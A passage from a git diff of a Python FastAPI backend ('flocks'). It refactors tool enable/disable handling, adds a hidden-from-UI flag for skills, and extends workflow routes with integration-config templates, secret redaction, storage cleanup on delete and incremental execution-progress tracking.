+                model_usage[model_key] = model_usage.get(model_key, 0) + 1
         
         # Calculate duration
-        created_ms = info.time.created
-        updated_ms = info.time.updated
+        created_ms = session.time.created
+        updated_ms = session.time.updated
         duration_ms = updated_ms - created_ms
         duration_seconds = duration_ms / 1000
         
@@ -3788,6 +4000,8 @@ async def get_session_statistics(sessionID: str):
         
         log.info("session.statistics", {"sessionID": sessionID, "messages": message_count})
         return stats
+    except HTTPException:
+        raise
     except Exception as e:
         log.error("session.statistics.error", {"sessionID": sessionID, "error": str(e)})
         raise HTTPException(status_code=500, detail=f"Failed to get session statistics: {str(e)}")
@@ -3803,11 +4017,13 @@ async def _clear_session_history(sessionID: str) -> int:
         )
 
     from flocks.server.routes.event import publish_event
+    from flocks.session.goal import GoalManager
     from flocks.session.interaction_queue import InteractionQueue
     from flocks.session.message import Message
 
     await abort_session(sessionID)
     await InteractionQueue.clear(sessionID)
+    await GoalManager.clear(sessionID)
     try:
         await _publish_prompt_queue(sessionID)
     except Exception as exc:
diff --git a/flocks/server/routes/skill.py b/flocks/server/routes/skill.py
index 556720b42..f270b15c8 100644
--- a/flocks/server/routes/skill.py
+++ b/flocks/server/routes/skill.py
@@ -81,6 +81,7 @@ class SkillResponse(BaseModel):
     source: Optional[str] = Field(None, description="Discovery source")
     content: Optional[str] = Field(None, description="Full SKILL.md content")
     category: Optional[str] = Field(None, description="Skill category (e.g. 'system')")
+    ui_hidden: bool = Field(False, description="Whether the skill is omitted from user-facing skill UI")
     # Extended fields
     eligible: Optional[bool] = Field(None, description="Whether all requirements are met")
     missing: Optional[List[str]] = Field(None, description="Missing bins/env vars")
@@ -246,6 +247,7 @@ def _skill_to_response(
         source=skill.source,
         content=content,
         category=skill.category,
+        ui_hidden=skill.ui_hidden,
         eligible=skill.eligible,
         missing=skill.missing,
         requires=requires_resp,
@@ -443,6 +445,7 @@ async def create_skill(req: SkillCreateRequest, _user=Depends(require_user)):
             location=str(skill_path),
             source="user",
             content=full_content,
+            ui_hidden=False,
             disabled=False,
         )
     except HTTPException:
@@ -512,6 +515,7 @@ async def update_skill(name: str, req: SkillCreateRequest, _user=Depends(require
             location=location,
             source=skill.source,
             content=full_content,
+            ui_hidden=skill.ui_hidden,
             # Reflect the post-update disabled state so the UI doesn't
             # report ``disabled=False`` when the user actually renamed a
             # disabled skill (Skill.rename_disabled migrates the flag).
diff --git a/flocks/server/routes/tool.py b/flocks/server/routes/tool.py
index 6a4590add..765a1f3e7 100644
--- a/flocks/server/routes/tool.py
+++ b/flocks/server/routes/tool.py
@@ -423,6 +423,37 @@ def _get_effective_tool_enabled(tool_info: ToolInfo) -> bool:
     return tool_info.enabled and _get_api_service_enabled(source_name)
 
 
+def _set_global_tool_enabled(tool: Any, desired: bool) -> bool:
+    """Persist and apply the global enabled state for a registry tool."""
+    default = _get_default_enabled(tool.info)
+    # Service gate: only matters when the user is trying to enable.
+    # Disabling is always honoured.
+    service_ok = _service_allows_enable(tool.info)
+    new_enabled = desired and service_ok
+
+    if desired == default:
+        removed = ConfigWriter.delete_tool_setting(tool.info.name)
+        log.info("tool.updated.reset_to_default", {
+            "name": tool.info.name,
+            "enabled": new_enabled,
+            "default": default,
+            "removed_overlay": removed,
+        })
+    else:
+        ConfigWriter.set_tool_setting(tool.info.name, {"enabled": desired})
+        log.info("tool.updated", {
+            "name": tool.info.name,
+            "enabled": new_enabled,
+            "requested": desired,
+            "blocked_by_service": desired and not service_ok,
+            "native": tool.info.native,
+            "store": "overlay",
+        })
+
+    tool.info.enabled = new_enabled
+    return new_enabled
+
+
 # Routes
 
 @router.get(
@@ -529,9 +560,11 @@ async def update_tool(
     Persists to the SQLite ``device_tool_settings`` table (one row per
     device_id × tool_name).  Only affects tool execution when ``device_id``
     is explicitly targeted, allowing Device A and Device B (same plugin
-    version, different names) to carry independent tool enabled/disabled
-    states.  Rows are removed automatically via ON DELETE CASCADE when the
-    parent device row is deleted.
+    version, different names) to carry independent disabled overrides.
+    ``enabled=true`` clears the per-device disable and follows the global
+    tool setting; if the global tool is disabled, it is enabled first. Rows
+    are removed automatically via ON DELETE CASCADE when the parent device row
+    is deleted.
 
     Two behaviours of note (global mode only):
 
@@ -561,14 +594,16 @@ async def update_tool(
             delete_device_tool_setting,
             set_device_tool_enabled,
         )
+
         if desired:
-            # "Enable" in per-device mode means removing the per-device
-            # override so the global/factory default takes effect again.
+            if not tool.info.enabled:
+                _set_global_tool_enabled(tool, True)
             removed = await delete_device_tool_setting(device_id, tool_name)
             log.info("tool.device.updated.reset_to_global", {
                 "name": tool_name,
                 "device_id": device_id,
                 "removed_override": removed,
+                "enabled_global": tool.info.enabled,
             })
         else:
             await set_device_tool_enabled(device_id, tool_name, False)
@@ -577,37 +612,13 @@ async def update_tool(
                 "device_id": device_id,
                 "enabled": False,
             })
-        # The in-memory ToolInfo.enabled is NOT changed; it reflects global
-        # state.  Per-device gating happens at ToolRegistry.execute time.
+        # The in-memory ToolInfo.enabled reflects global state. Per-device
+        # enabled=True is not a supported override; switch-on means clear the
+        # per-device disable and follow the global tool setting.
         return _build_tool_response(tool.info)
 
     # --- Global mode (original behaviour) ---
-    default = _get_default_enabled(tool.info)
-    # Service gate: only matters when the user is trying to enable.
-    # Disabling is always honoured.
-    service_ok = _service_allows_enable(tool.info)
-    new_enabled = desired and service_ok
-
-    if desired == default:
-        removed = ConfigWriter.delete_tool_setting(tool_name)
-        log.info("tool.updated.reset_to_default", {
-            "name": tool_name,
-            "enabled": new_enabled,
-            "default": default,
-            "removed_overlay": removed,
-        })
-    else:
-        ConfigWriter.set_tool_setting(tool_name, {"enabled": desired})
-        log.info("tool.updated", {
-            "name": tool_name,
-            "enabled": new_enabled,
-            "requested": desired,
-            "blocked_by_service": desired and not service_ok,
-            "native": tool.info.native,
-            "store": "overlay",
-        })
-
-    tool.info.enabled = new_enabled
+    _set_global_tool_enabled(tool, desired)
     return _build_tool_response(tool.info)
 
 
diff --git a/flocks/server/routes/user_defined_pages.py b/flocks/server/routes/user_defined_pages.py
index 151cfcffe..924422064 100644
--- a/flocks/server/routes/user_defined_pages.py
+++ b/flocks/server/routes/user_defined_pages.py
@@ -270,7 +270,6 @@ async def get_user_defined_page_bundle(page_id: str, v: Optional[str] = Query(No
         return FileResponse(
             path=bundle_path,
             media_type="application/javascript",
-            filename="page.js",
             headers=headers,
         )
     except ValueError as exc:
diff --git a/flocks/server/routes/workflow.py b/flocks/server/routes/workflow.py
index a54631a4a..62d846d14 100644
--- a/flocks/server/routes/workflow.py
+++ b/flocks/server/routes/workflow.py
@@ -16,7 +16,7 @@
 from dataclasses import dataclass
 from pathlib import Path
 from typing import List, Optional, Any, Dict, Literal
-from fastapi import APIRouter, HTTPException, Request, status, Query
+from fastapi import APIRouter, Body, HTTPException, Request, status, Query
 from pydantic import BaseModel, Field, ConfigDict
 import uuid
 
@@ -47,17 +47,23 @@
 from flocks.ingest.syslog.constants import WORKFLOW_SYSLOG_CONFIG_PREFIX
 from flocks.workflow.execution_store import (
     compact_history_for_storage,
+    compact_execution_summary,
     compact_outputs_for_storage,
     compact_step_for_storage,
     create_execution_record,
+    derive_loop_progress,
+    load_execution_steps,
     normalize_execution_status as _normalize_execution_status,
+    record_execution_step,
     record_execution_result as _record_execution_result,
     resolve_execution_outcome as _resolve_execution_outcome,
     workflow_execution_key as _workflow_execution_key,
+    workflow_execution_step_prefix as _workflow_execution_step_prefix,
 )
 from flocks.workflow.io import load_workflow, dump_workflow
 from flocks.workflow.tool_context import build_workflow_tool_context
 from flocks.workflow.tools import get_tool_registry
+from flocks.workflow.visibility import is_hidden_workflow_data
 from flocks.workflow.triggers import (
     TriggerDefinition,
     TriggerEvent,
@@ -88,7 +94,34 @@
 webhook_router = APIRouter()
 log = Log.create(service="workflow-routes")
 
+_PROGRESS_FLUSH_EVERY_STEPS = 5
+
 _LEGACY_SINGLETON_TRIGGER_TYPES = frozenset({"schedule", "kafka", "syslog"})
+_WORKFLOW_INTEGRATION_CONFIG_VERSION = 1
+_WORKFLOW_INTEGRATION_CONFIG_KIND = "workflow.integration-config"
+_WORKFLOW_INTEGRATION_CONFIG_PREFIX = "workflow_integration_config/"
+_WORKFLOW_CENTER_REGISTRY_PREFIX = "workflow_registry/"
+_WORKFLOW_CENTER_RELEASE_PREFIX = "workflow_release/"
+_WORKFLOW_CENTER_RUNTIME_PREFIX = "workflow_runtime/"
+_WORKFLOW_CENTER_LOCAL_PID_PREFIX = "workflow_local_pid/"
+_WORKFLOW_POLLER_CONFIG_PREFIX = "workflow_poller_config/"
+_WORKFLOW_CONFIG_TRIGGER_TYPES = frozenset({
+    "manual",
+    "schedule",
+    "webhook",
+    "syslog",
+    "kafka",
+    "internal_event",
+    "custom_webhook",
+    "custom_adapter",
+    "plugin",
+    "api",
+    "publish",
+    "api_service",
+    "service",
+})
+_WORKFLOW_CONFIG_SECRET_KEYS = frozenset({"apikey", "password", "token", "secret"})
+_WORKFLOW_CONFIG_SECRET_REF_KEYS = frozenset({"secretref", "secretreference"})
 
 
 @dataclass
@@ -111,6 +144,7 @@ class WorkflowCreateRequest(BaseModel):
     model_config = ConfigDict(populate_by_name=True)
     
     name: str = Field(..., description="Workflow name")
+    name_i18n: Optional[Dict[str, str]] = Field(None, alias="nameI18n", description="Localized workflow display names")
     description: Optional[str] = Field(None, description="Workflow description")
     category: Optional[str] = Field("default", description="Workflow category")
     workflow_json: Dict[str, Any] = Field(..., alias="workflowJson", description="Workflow JSON definition")
@@ -126,9 +160,20 @@ class WorkflowUpdateRequest(BaseModel):
     model_config = ConfigDict(populate_by_name=True)
     
     name: Optional[str] = Field(None, description="Workflow name")
+    name_i18n: Optional[Dict[str, str]] = Field(None, alias="nameI18n", description="Localized workflow display names")
     description: Optional[str] = Field(None, description="Workflow description")
     category: Optional[str] = Field(None, description="Workflow category")
     workflow_json: Optional[Dict[str, Any]] = Field(None, alias="workflowJson", description="Workflow JSON")
+    markdown_content: Optional[str] = Field(
+        None,
+        alias="markdownContent",
+        description="Human-editable workflow.md content",
+    )
+    edit_markdown_content: Optional[str] = Field(
+        None,
+        alias="editMarkdownContent",
+        description="Legacy alias for markdownContent",
+    )
     status: Optional[Literal["draft", "active", "archived"]] = Field(None, description="Status")
 
 
@@ -138,8 +183,10 @@ class WorkflowResponse(BaseModel):
     
     id: str = Field(..., description="Workflow ID")
     name: str = Field(..., description="Workflow name")
+    nameI18n: Optional[Dict[str, str]] = Field(None, description="Localized workflow display names")
     description: Optional[str] = Field(None, description="Description")
     markdownContent: Optional[str] = Field(None, description="Workflow markdown documentation content")
+    editMarkdownContent: Optional[str] = Field(None, description="Human-editable workflow markdown document content")
     category: str = Field("default", description="Category")
     workflowJson: Dict[str, Any] = Field(..., description="Workflow JSON")
     status: str = Field("draft", description="Status")
@@ -185,6 +232,11 @@ class WorkflowExecutionResponse(BaseModel):
     currentNodeType: Optional[str] = Field(None, description="Current running node type")
     currentPhase: Optional[str] = Field(None, description="Current execution phase")
     currentStepIndex: Optional[int] = Field(None, description="Current step index")
+    stepCount: Optional[int] = Field(None, description="Persisted execution step count")
+    stepLogOffset: Optional[int] = Field(None, description="Returned step log offset")
+    stepLogLimit: Optional[int] = Field(None, description="Returned step log limit")
+    stepLogTotal: Optional[int] = Field(None, description="Total persisted step logs")
+    loopProgress: Optional[Dict[str, Any]] = Field(None, description="Best-effort loop progress metadata")
 
 
 class WorkflowCenterPublishRequest(BaseModel):
@@ -235,6 +287,31 @@ def _global_workflow_dir(workflow_id: str) -> Path:
     return Path.home() / ".flocks" / "plugins" / "workflows" / workflow_id
 
 
+def _existing_workflow_dir(workflow_id: str) -> Optional[Path]:
+    """Return the highest-priority existing directory for a workflow."""
+    result: Optional[Path] = None
+    for root, _source in _all_scan_dirs():
+        wf_dir = root / workflow_id
+        if (wf_dir / "workflow.json").is_file():
+            result = wf_dir
+    return result
+
+
+def _workflow_config_dir(workflow_id: str, workflow_data: Optional[Dict[str, Any]] = None) -> Path:
+    """Return the directory where workflow-local config.json should be written."""
+    existing = _existing_workflow_dir(workflow_id)
+    if existing is not None:
+        return existing
+    if workflow_data and workflow_data.get("source") == "global":
+        return _global_workflow_dir(workflow_id)
+    return _workflow_dir(workflow_id)
+
+
+def _workflow_integration_config_key(workflow_id: str) -> str:
+    """Storage key for the publish/integration template used by the UI."""
+    return f"{_WORKFLOW_INTEGRATION_CONFIG_PREFIX}{workflow_id}"
+
+
 def _read_workflow_from_fs(workflow_id: str) -> Optional[Dict[str, Any]]:
     """Read workflow data from the filesystem.
 
@@ -269,6 +346,7 @@ def _write_workflow_to_fs(
     workflow_json: Dict[str, Any],
     meta: Dict[str, Any],
     markdown_content: Optional[str] = None,
+    edit_markdown_content: Optional[str] = None,
     *,
     global_store: bool = False,
 ) -> None:
@@ -283,14 +361,25 @@ def _write_workflow_to_fs(
     with open(wf_dir / "workflow.json", "w", encoding="utf-8") as f:
         json.dump(workflow_json, f, ensure_ascii=False, indent=2)
 
-    meta_to_save = {k: v for k, v in meta.items() if k not in ("workflowJson", "markdownContent", "stats", "source")}
+    meta_to_save = {
+        k: v
+        for k, v in meta.items()
+        if k not in ("workflowJson", "markdownContent", "editMarkdownContent", "stats", "source")
+    }
     with open(wf_dir / "meta.json", "w", encoding="utf-8") as f:
         json.dump(meta_to_save, f, ensure_ascii=False, indent=2)
 
+    if markdown_content is None and edit_markdown_content is not None:
+        markdown_content = edit_markdown_content
+
     if markdown_content is not None:
         with open(wf_dir / "workflow.md", "w", encoding="utf-8") as f:
             f.write(markdown_content)
 
+    legacy_edit_file = wf_dir / "workflow.edit.md"
+    if legacy_edit_file.exists():
+        legacy_edit_file.unlink()
+
 
 def _delete_workflow_from_fs(workflow_id: str) -> bool:
     """Remove a workflow directory from all known locations (primary + legacy plugins).
@@ -307,6 +396,80 @@ def _delete_workflow_from_fs(workflow_id: str) -> bool:
     return deleted
 
 
+async def _remove_storage_key_if_exists(key: str) -> None:
+    try:
+        await Storage.remove(key)
+    except Storage.NotFoundError:
+        pass
+    except Exception as exc:
+        log.warning("workflow.delete.storage_key_remove_failed", {"key": key, "error": str(exc)})
+
+
+async def _remove_storage_prefix(prefix: str) -> None:
+    try:
+        keys = await Storage.list(prefix)
+    except Exception as exc:
+        log.warning("workflow.delete.storage_prefix_list_failed", {"prefix": prefix, "error": str(exc)})
+        return
+
+    for key in keys:
+        try:
+            await Storage.remove(key)
+        except Storage.NotFoundError:
+            pass
+        except Exception as exc:
+            log.warning("workflow.delete.storage_key_remove_failed", {"key": key, "error": str(exc)})
+
+
+async def _stop_workflow_runtime_resources(workflow_id: str) -> None:
+    for exec_id, active in list(_active_workflow_executions.items()):
+        if active.workflow_id == workflow_id:
+            active.cancel_event.set()
+
+    try:
+        await stop_workflow_service(workflow_id)
+    except Exception as exc:
+        log.debug("workflow.delete.stop_service_ignored", {"id": workflow_id, "error": str(exc)})
+
+    try:
+        await default_trigger_runtime.restart_workflow(workflow_id, {"triggers": []})
+    except Exception as exc:
+        log.debug("workflow.delete.stop_triggers_ignored", {"id": workflow_id, "error": str(exc)})
+
+
+async def _cleanup_workflow_storage(workflow_id: str) -> None:
+    await _remove_storage_key_if_exists(_workflow_stats_key(workflow_id))
+    await _remove_storage_key_if_exists(_workflow_integration_config_key(workflow_id))
+    await _remove_storage_key_if_exists(_api_service_key(workflow_id))
+    await _remove_storage_key_if_exists(_syslog_config_key(workflow_id))
+    await _remove_storage_key_if_exists(_kafka_config_key(workflow_id))
+    await _remove_storage_key_if_exists(f"{_WORKFLOW_POLLER_CONFIG_PREFIX}{workflow_id}")
+    await _remove_storage_key_if_exists(f"{_WORKFLOW_CENTER_REGISTRY_PREFIX}{workflow_id}")
+    await _remove_storage_key_if_exists(f"{_WORKFLOW_CENTER_RUNTIME_PREFIX}{workflow_id}")
+    await _remove_storage_key_if_exists(f"{_WORKFLOW_CENTER_LOCAL_PID_PREFIX}{workflow_id}")
+    await _remove_storage_prefix(f"{_WORKFLOW_CENTER_RELEASE_PREFIX}{workflow_id}/")
+
+    try:
+        exec_keys = await Storage.list("workflow_execution/")
+        for key in exec_keys:
+            try:
+                exec_data = await Storage.read(key)
+                if isinstance(exec_data, dict) and exec_data.get("workflowId") == workflow_id:
+                    await Storage.remove(key)
+                    exec_id = key.rsplit("/", 1)[-1]
+                    step_rows = await Storage.list_raw(_workflow_execution_step_prefix(exec_id))
+                    for step_key, _value in step_rows:
+                        await Storage.remove(step_key)
+            except Exception:
+                pass
+    except Exception:
+        pass
+
+    service_dir = Config.get_data_path() / "workflow-services" / "workflows" / workflow_id
+    if service_dir.is_dir():
+        shutil.rmtree(service_dir, ignore_errors=True)
+
+
 def _scan_workflow_base_dir(base_dir: Path, source: str) -> Dict[str, Dict[str, Any]]:
     """Scan a single workflow base directory and return {id: data} dict."""
     results: Dict[str, Dict[str, Any]] = {}
@@ -316,7 +479,7 @@ def _scan_workflow_base_dir(base_dir: Path, source: str) -> Dict[str, Dict[str,
         if not entry.is_dir():
             continue
         data = _read_workflow_dir(entry, entry.name, source)
-        if data is not None:
+        if data is not None and not is_hidden_workflow_data(data):
             results[entry.name] = data
     return results
 
@@ -459,6 +622,281 @@ def _trigger_to_api_dict(trigger: TriggerDefinition) -> Dict[str, Any]:
     return trigger.model_dump(mode="json", by_alias=True, exclude_none=True)
 
 
+def _drop_none_values(payload: Dict[str, Any]) -> Dict[str, Any]:
+    return {key: value for key, value in payload.items() if value is not None}
+
+
+def _normalized_config_key(key: Any) -> str:
+    return str(key).replace("_", "").replace("-", "").lower()
+
+
+def _sanitize_workflow_config_secrets(value: Any) -> Any:
+    if isinstance(value, list):
+        return [_sanitize_workflow_config_secrets(item) for item in value]
+    if not isinstance(value, dict):
+        return value
+
+    sanitized: Dict[str, Any] = {}
+    for key, nested in value.items():
+        normalized_key = _normalized_config_key(key)
+        is_secret_key = (
+            normalized_key in _WORKFLOW_CONFIG_SECRET_KEYS
+            or normalized_key.endswith(("apikey", "password", "token", "secret"))
+        ) and normalized_key not in _WORKFLOW_CONFIG_SECRET_REF_KEYS
+        if is_secret_key:
+            if nested not in (None, ""):
+                configured_key = "apiKeyConfigured" if normalized_key == "apikey" else f"{key}Configured"
+                sanitized[configured_key] = True
+            continue
+        sanitized[str(key)] = _sanitize_workflow_config_secrets(nested)
+    return sanitized
+
+
+def _normalize_workflow_integration_config_template(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    config: Dict[str, Any],
+) -> Dict[str, Any]:
+    if not isinstance(config, dict):
+        raise HTTPException(status_code=422, detail="config must be a JSON object")
+
+    payload = _sanitize_workflow_config_secrets(config)
+    payload.pop("runtime", None)
+
+    kind = payload.get("kind", _WORKFLOW_INTEGRATION_CONFIG_KIND)
+    if kind != _WORKFLOW_INTEGRATION_CONFIG_KIND:
+        raise HTTPException(
+            status_code=422,
+            detail=f"config.kind must be {_WORKFLOW_INTEGRATION_CONFIG_KIND}",
+        )
+    payload["kind"] = _WORKFLOW_INTEGRATION_CONFIG_KIND
+
+    version = payload.get("version", _WORKFLOW_INTEGRATION_CONFIG_VERSION)
+    if not isinstance(version, int):
+        raise HTTPException(status_code=422, detail="config.version must be an integer")
+    payload["version"] = version
+
+    workflow = payload.get("workflow") or {}
+    if not isinstance(workflow, dict):
+        raise HTTPException(status_code=422, detail="config.workflow must be an object")
+    if workflow.get("id") not in (None, workflow_id):
+        raise HTTPException(status_code=409, detail="config.workflow.id does not match the route workflow id")
+    workflow["id"] = workflow_id
+    workflow.setdefault("name", workflow_data.get("name") or workflow_id)
+    if workflow_data.get("category") is not None:
+        workflow.setdefault("category", workflow_data.get("category"))
+    if workflow_data.get("source") is not None:
+        workflow.setdefault("source", workflow_data.get("source"))
+    payload["workflow"] = workflow
+
+    publish = payload.get("publish", {})
+    if publish is None:
+        publish = {}
+    if not isinstance(publish, dict):
+        raise HTTPException(status_code=422, detail="config.publish must be an object")
+    payload["publish"] = publish
+
+    if "triggers" not in payload and isinstance(payload.get("integrations"), list):
+        payload["triggers"] = payload["integrations"]
+    triggers = payload.get("triggers", [])
+    if triggers is None:
+        triggers = []
+    if not isinstance(triggers, list):
+        raise HTTPException(status_code=422, detail="config.triggers must be an array")
+    for index, trigger in enumerate(triggers):
+        if not isinstance(trigger, dict):
+            raise HTTPException(status_code=422, detail=f"config.triggers[{index}] must be an object")
+        trigger_type = str(trigger.get("type") or "").strip()
+        if not trigger_type:
+            raise HTTPException(status_code=422, detail=f"config.triggers[{index}].type is required")
+        normalized_type = trigger_type.lower().replace("-", "_")
+        if normalized_type not in _WORKFLOW_CONFIG_TRIGGER_TYPES:
+            raise HTTPException(
+                status_code=422,
+                detail=f"Unsupported config trigger type: {trigger_type}",
+            )
+        trigger["type"] = normalized_type
+    payload["triggers"] = triggers
+    payload["updatedAt"] = int(time.time() * 1000)
+    return payload
+
+
+def _auth_for_config(auth: Optional[Any]) -> Optional[Dict[str, Any]]:
+    if auth is None:
+        return None
+    if hasattr(auth, "model_dump"):
+        auth_payload = auth.model_dump(mode="json", by_alias=True, exclude_none=True)
+    elif isinstance(auth, dict):
+        auth_payload = dict(auth)
+    else:
+        return None
+
+    if "apiKey" in auth_payload:
+        auth_payload.pop("apiKey", None)
+        auth_payload["apiKeyConfigured"] = True
+    return auth_payload
+
+
+def _trigger_for_config(workflow_id: str, trigger: TriggerDefinition) -> Dict[str, Any]:
+    payload = _trigger_to_api_dict(trigger)
+    if trigger.auth is not None:
+        payload["auth"] = _auth_for_config(trigger.auth)
+
+    if trigger.type in ("webhook", "custom_webhook"):
+        payload["invoke"] = {
+            "method": str((trigger.source or {}).get("method") or "POST").upper(),
+            "path": f"/webhook/workflows/{workflow_id}/{trigger.id}",
+        }
+    return payload
+
+
+def _publish_for_config(service: Optional[Dict[str, Any]]) -> Dict[str, Any]:
+    service = service if isinstance(service, dict) else None
+    status_value = str(service.get("status") or "stopped") if service else "stopped"
+    return _drop_none_values(
+        {
+            "type": "api_service",
+            "enabled": bool(service) and status_value not in {"stopped", "unpublished"},
+            "status": status_value,
+            "driver": service.get("driver") if service else None,
+            "serviceUrl": service.get("serviceUrl") if service else None,
+            "invokeUrl": service.get("invokeUrl") if service else None,
+            "containerName": service.get("containerName") if service else None,
+            "publishedAt": service.get("publishedAt") if service else None,
+            "stoppedAt": service.get("stoppedAt") if service else None,
+            "apiKeyConfigured": bool(service and service.get("apiKey")),
+        }
+    )
+
+
+async def _build_workflow_integration_config(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    *,
+    triggers: Optional[List[TriggerDefinition]] = None,
+    service: Optional[Dict[str, Any]] = None,
+) -> Dict[str, Any]:
+    trigger_defs = triggers
+    if trigger_defs is None:
+        trigger_defs = await _get_workflow_trigger_defs(workflow_id, workflow_data)
+    if service is None:
+        service = await Storage.read(_api_service_key(workflow_id))
+    now_ms = int(time.time() * 1000)
+    return {
+        "version": _WORKFLOW_INTEGRATION_CONFIG_VERSION,
+        "kind": "workflow.integration-config",
+        "workflow": _drop_none_values(
+            {
+                "id": workflow_id,
+                "name": workflow_data.get("name") or workflow_id,
+                "category": workflow_data.get("category"),
+                "source": workflow_data.get("source"),
+            }
+        ),
+        "updatedAt": now_ms,
+        "publish": _publish_for_config(service),
+        "triggers": [_trigger_for_config(workflow_id, trigger) for trigger in trigger_defs],
+    }
+
+
+async def _build_workflow_integration_runtime(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+) -> Dict[str, Any]:
+    triggers = await _get_workflow_trigger_defs(workflow_id, workflow_data)
+    service = await Storage.read(_api_service_key(workflow_id))
+    statuses: Dict[str, Dict[str, Any]] = {}
+    try:
+        statuses = {
+            item.get("triggerId"): item
+            for item in await default_trigger_runtime.get_workflow_trigger_statuses(
+                workflow_id,
+                set_workflow_json_triggers(workflow_data.get("workflowJson") or {}, triggers),
+            )
+            if item.get("triggerId")
+        }
+    except Exception as exc:
+        log.warning("workflow.config.runtime_status_failed", {
+            "id": workflow_id,
+            "error": str(exc),
+        })
+
+    return {
+        "publish": _publish_for_config(service),
+        "triggers": [
+            {
+                "trigger": _trigger_to_api_dict(trigger),
+                "status": statuses.get(trigger.id),
+            }
+            for trigger in triggers
+        ],
+    }
+
+
+async def _write_workflow_integration_config(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    *,
+    triggers: Optional[List[TriggerDefinition]] = None,
+    service: Optional[Dict[str, Any]] = None,
+) -> tuple[Path, Dict[str, Any]]:
+    config_dir = _workflow_config_dir(workflow_id, workflow_data)
+    config_dir.mkdir(parents=True, exist_ok=True)
+    config = await _build_workflow_integration_config(
+        workflow_id,
+        workflow_data,
+        triggers=triggers,
+        service=service,
+    )
+    config_path = config_dir / "config.json"
+    config_path.write_text(
+        json.dumps(config, ensure_ascii=False, indent=2),
+        encoding="utf-8",
+    )
+    return config_path, config
+
+
+async def _read_stored_workflow_integration_config(workflow_id: str) -> Optional[Dict[str, Any]]:
+    stored = await Storage.read(_workflow_integration_config_key(workflow_id))
+    return stored if isinstance(stored, dict) else None
+
+
+async def _read_file_workflow_integration_config(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    config_path: Path,
+) -> Optional[Dict[str, Any]]:
+    if not config_path.is_file():
+        return None
+    raw_config = json.loads(config_path.read_text(encoding="utf-8"))
+    if not isinstance(raw_config, dict):
+        raise HTTPException(status_code=422, detail="workflow config file must contain a JSON object")
+    return _normalize_workflow_integration_config_template(workflow_id, workflow_data, raw_config)
+
+
+async def _load_workflow_integration_config_template(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    config_path: Path,
+) -> tuple[Optional[Dict[str, Any]], str]:
+    """Load publish template from Storage first, then migrate legacy config.json."""
+    stored = await _read_stored_workflow_integration_config(workflow_id)
+    if stored is not None:
+        return stored, "storage"
+
+    file_config = await _read_file_workflow_integration_config(workflow_id, workflow_data, config_path)
+    if file_config is not None:
+        await Storage.write(_workflow_integration_config_key(workflow_id), file_config)
+        log.info("workflow.config.migrated_from_file", {
+            "id": workflow_id,
+            "path": str(config_path),
+            "storage_key": _workflow_integration_config_key(workflow_id),
+        })
+        return file_config, "file_migrated"
+
+    return None, "missing"
+
+
 def _replace_or_append_trigger(
     triggers: List[TriggerDefinition],
     trigger: TriggerDefinition,
@@ -563,7 +1001,13 @@ async def _persist_workflow_triggers(
     data["workflowJson"] = updated_json
     data["updatedAt"] = int(time.time() * 1000)
     is_global = data.get("source") == "global"
-    _write_workflow_to_fs(workflow_id, updated_json, data, data.get("markdownContent"), global_store=is_global)
+    _write_workflow_to_fs(
+        workflow_id,
+        updated_json,
+        data,
+        data.get("markdownContent"),
+        global_store=is_global,
+    )
     return data
 
 
@@ -579,27 +1023,27 @@ async def _run_workflow_execution_task(
     """Execute a workflow in the background and keep the execution record updated."""
     exec_key = _workflow_execution_key(exec_id)
     start_time = time.time()
-    step_history: list[dict[str, Any]] = []
+    step_count = 0
     loop = asyncio.get_running_loop()
+    pending_step_index: Optional[int] = None
+    pending_step: Optional[Dict[str, Any]] = None
+    execution_summary: Dict[str, Any] = {
+        "id": exec_id,
+        "workflowId": workflow_id,
+        "inputParams": compact_outputs_for_storage(req.inputs or {}),
+        "status": "running",
+        "startedAt": int(start_time * 1000),
+        "executionLog": [],
+        "currentPhase": "queued",
+        "currentStepIndex": 0,
+        "stepCount": 0,
+    }
 
     def _write_progress(update_fields: Dict[str, Any]) -> None:
-        # Called from the workflow-engine worker thread on every step
-        # start/complete.  Step events for a single execution are issued
-        # serially by the engine, so no extra lock is needed beyond the
-        # caller's invariant — but we must still tolerate transient
-        # ``Storage.read`` failures (e.g. SQLite contention) without
-        # corrupting ``current`` with a non-dict result.
         try:
-            current = asyncio.run_coroutine_threadsafe(
-                Storage.read(exec_key), loop
-            ).result(timeout=5)
-            if not isinstance(current, dict):
-                # Execution record was trimmed mid-run or never persisted;
-                # rebuild a minimal payload so the write still goes through.
-                current = {"id": exec_id, "workflowId": workflow_id}
-            current.update(update_fields)
+            execution_summary.update(update_fields)
             asyncio.run_coroutine_threadsafe(
-                Storage.write(exec_key, current), loop
+                Storage.write(exec_key, compact_execution_summary(execution_summary)), loop
             ).result(timeout=5)
         except Exception as exc:
             log.warning("workflow.step_progress.write_failed", {
@@ -608,29 +1052,87 @@ def _write_progress(update_fields: Dict[str, Any]) -> None:
             })
 
     def _on_step_start(_run_id, step_index, node, _inputs):
-        _write_progress({
-            "currentNodeId": getattr(node, "id", None),
-            "currentNodeType": getattr(node, "type", None),
+        nonlocal pending_step_index, pending_step
+        node_id = getattr(node, "id", None)
+        node_type = getattr(node, "type", None)
+        loop_progress = derive_loop_progress(
+            node_id=node_id,
+            global_step_index=step_index,
+            inputs=_inputs,
+            outputs=None,
+        )
+        pending_step_index = step_index
+        pending_step = {
+            "node_id": node_id,
+            "node_type": node_type,
+            "inputs": _inputs if isinstance(_inputs, dict) else {},
+            "outputs": {},
+            "error": "Run cancelled before node completed",
+        }
+        execution_summary.update({
+            "currentNodeId": node_id,
+            "currentNodeType": node_type,
             "currentPhase": "running",
             "currentStepIndex": step_index,
+            "loopProgress": loop_progress,
+            "updatedAt": int(time.time() * 1000),
         })
         return step_index
 
     def _on_step_complete(step_result) -> None:
-        # Compact each step's outputs *before* appending so the running
-        # ``step_history`` (and every subsequent ``_write_progress`` snapshot
-        # that ships it to SQLite) stays bounded, even when a workflow node
-        # returns tens of thousands of alerts that are already persisted to
-        # JSONL on disk.
+        nonlocal step_count, pending_step_index, pending_step
         step_dict = compact_step_for_storage(step_result.model_dump(mode="json"))
-        step_history.append(step_dict)
-        _write_progress({
-            "executionLog": list(step_history),
+        step_count += 1
+        pending_step_index = None
+        pending_step = None
+        loop_progress = derive_loop_progress(
